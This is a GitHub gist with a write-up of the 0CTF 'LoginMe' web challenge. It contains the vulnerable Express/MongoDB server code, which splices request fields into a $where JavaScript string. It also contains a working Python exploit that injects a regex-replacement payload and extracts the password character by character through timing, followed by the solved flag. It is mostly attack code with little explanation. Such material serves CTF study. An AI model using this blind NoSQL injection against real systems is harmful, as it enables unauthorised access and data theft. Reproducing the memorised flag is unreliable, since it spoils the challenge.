Skip to content

Instantly share code, notes, and snippets.

@bongtrop
Last active April 2, 2018 09:43
Show Gist options
  • Save bongtrop/1acad2e0322d7f5894cac531fe4e37d9 to your computer and use it in GitHub Desktop.
Save bongtrop/1acad2e0322d7f5894cac531fe4e37d9 to your computer and use it in GitHub Desktop.
0CTF [WEB] LoginMe Writeup
var express = require('express')
var app = express()
var bodyParser = require('body-parser')
app.use(bodyParser.urlencoded({}));
var path = require("path");
var moment = require('moment');
var MongoClient = require('mongodb').MongoClient;
var url = "mongodb://localhost:27017/";
MongoClient.connect(url, function(err, db) {
if (err) throw err;
dbo = db.db("test_db");
var collection_name = "users";
var password_column = "password_"+Math.random().toString(36).slice(2)
var password = "XXXXXXXXXXXXXXXXXXXXXX";
// flag is flag{password}
var myobj = { "username": "admin", "last_access": moment().format('YYYY-MM-DD HH:mm:ss Z')};
myobj[password_column] = password;
dbo.collection(collection_name).remove({});
dbo.collection(collection_name).update(
{ name: myobj.name },
myobj,
{ upsert: true }
);
app.get('/', function (req, res) {
res.sendFile(path.join(__dirname,'index.html'));
})
app.post('/check', function (req, res) {
var check_function = 'if(this.username == #username# && #username# == "admin" && hex_md5(#password#) == this.'+password_column+'){\nreturn 1;\n}else{\nreturn 0;}';
for(var k in req.body){
var valid = ['#','(',')'].every((x)=>{return req.body[k].indexOf(x) == -1});
if(!valid) res.send('Nope');
check_function = check_function.replace(
new RegExp('#'+k+'#','gm')
,JSON.stringify(req.body[k]))
}
var query = {"$where" : check_function};
var newvalue = {$set : {last_access: moment().format('YYYY-MM-DD HH:mm:ss Z')}}
dbo.collection(collection_name).updateOne(query,newvalue,function (e,r){
if(e) throw e;
res.send('ok');
// ... implementing, plz dont release this.
});
})
app.listen(8081)
});
import requests
lt = "0123456789abcdef"
data = "username=admin&password=y&|hex_md5(.)(.)y.(.)....this.password_(\w%2b)|=$2%3d%3d$2$2+%26%26+this.password_$4[{x}]%3d%3d'{y}'+%26%26+xxx$11000$3+%26%26+$2$2%3d%3d$2"
res = ""
for i in range(32):
for c in lt:
j = 0
xx = False
while True:
j+=1
try:
payload = data.format(x=i, y=c)
r = requests.post("http://202.120.7.194:8081/check", data=payload, headers={"Content-Type": "application/x-www-form-urlencoded"})
break
except:
if j==3:
res += c
print res
xx = True
break
if xx:
break
# flag{13fc892df79a86494792e14dcbef252a}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment